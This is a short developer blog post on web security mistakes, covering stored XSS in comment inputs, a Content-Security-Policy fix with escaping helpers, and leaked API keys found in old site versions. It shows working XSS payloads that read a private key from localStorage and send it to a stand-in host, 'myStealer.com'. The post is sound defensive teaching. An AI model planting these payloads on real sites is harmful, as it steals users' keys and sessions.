
Ways to hack a Website #1

Nokol ・2 min read

Ok, I'm writing this so you can avoid making these kinds of mistakes.

Let's begin.

Do you host a blog, a comment function or something similar?
Watch every possible user input, otherwise attackers could put things like this in their text:

```javascript
javascript:(function(){var a=JSON.parse(localStorage.getItem('key'));window.location.href='http://myStealer.com/?k='+a.userData.appPrivateKey+','+location.origin;})();
```

Or, if you allow image inputs in HTML, they could just as easily write:

```html
<img src="test.gif" onerror="var a=JSON.parse(localStorage.getItem('key'));this.src='http://myStealer.com/?k='+a.PrivateKey+','+location.origin;this.onerror=null">
```

The session key is stolen the instant someone opens the website.

Avoid rendering user-supplied content as simple blobs; use real URLs instead, to avoid hacks like this:

```javascript
var svg = '<?xml version="1.0" encoding="utf-8"?>console.log(localStorage)';
var blob = new Blob([svg],{type:"image/svg+xml"});
document.getElementsByTagName('iframe')[0].src = URL.createObjectURL(blob);
```

Prevention technique:

```html
<meta http-equiv="Content-Security-Policy" content="script-src 'self'">
```

Note that if content delivery networks (CDNs) are used, those will have to be whitelisted as well.
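As an added example (not code from the original post), here is the defender side of the above: escape user text before it goes into the page so the `img onerror` payload is shown literally, only emit links with an http(s) scheme so a `javascript:` URL becomes plain text, and build the CSP header with any CDN origins you need to whitelist. The function names and the sample comment are made up for this example.

```javascript
// Escape the characters that let text break out of an HTML text node or
// attribute value. After this, "<img onerror=...>" is displayed, not executed.
function escapeHtml(untrusted) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(untrusted).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Only http(s) links are rendered as links; anything else (javascript:, data:)
// is written out as escaped text so the browser never treats it as a URL.
function safeLinkHtml(href) {
  if (typeof href !== 'string' || !/^https?:\/\//i.test(href)) {
    return escapeHtml(href || '');
  }
  return `<a href="${escapeHtml(href)}" rel="noopener noreferrer">${escapeHtml(href)}</a>`;
}

// Render one comment. Every piece of user-controlled data passes through
// escapeHtml or safeLinkHtml before it is concatenated into markup.
function renderComment(author, body, href) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)} ${safeLinkHtml(href)}</div>`;
}

// Build the Content-Security-Policy header value: your own origin plus any
// CDN origins you load scripts from. No 'unsafe-inline', so injected inline
// handlers and javascript: URLs are blocked even if escaping is ever missed.
function cspHeader(cdnOrigins) {
  const scriptSrc = ["'self'", ...(cdnOrigins || [])].join(' ');
  return `script-src ${scriptSrc}; object-src 'none'; base-uri 'self'`;
}

// Constructed sample: the img payload from the post, submitted as a comment.
const sampleComment = renderComment(
  'alice',
  '<img src="test.gif" onerror="this.src=\'http://myStealer.com/?k=\'+localStorage.key">',
  'javascript:alert(1)'
);
```

With an Express-style server you would send the header as `res.setHeader('Content-Security-Policy', cspHeader(['https://cdn.example.com']))` on every HTML response.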

CHANGE old static passwords and close old API holes.

From the browser developer console we can easily read API endpoints; the biggest mistake is assuming that minified files cannot be pretty-printed back into a readable format. Apps built with React, Angular or Vue are easy to read.

A common hack technique is to use the Wayback Machine (https://archive.org/web/) to find old leaks and hard-coded stuff.

Prevention:
Check what used to be hard-coded in old versions, maybe some passwords or API keys.

That's it for now.

Posted on May 25 by:
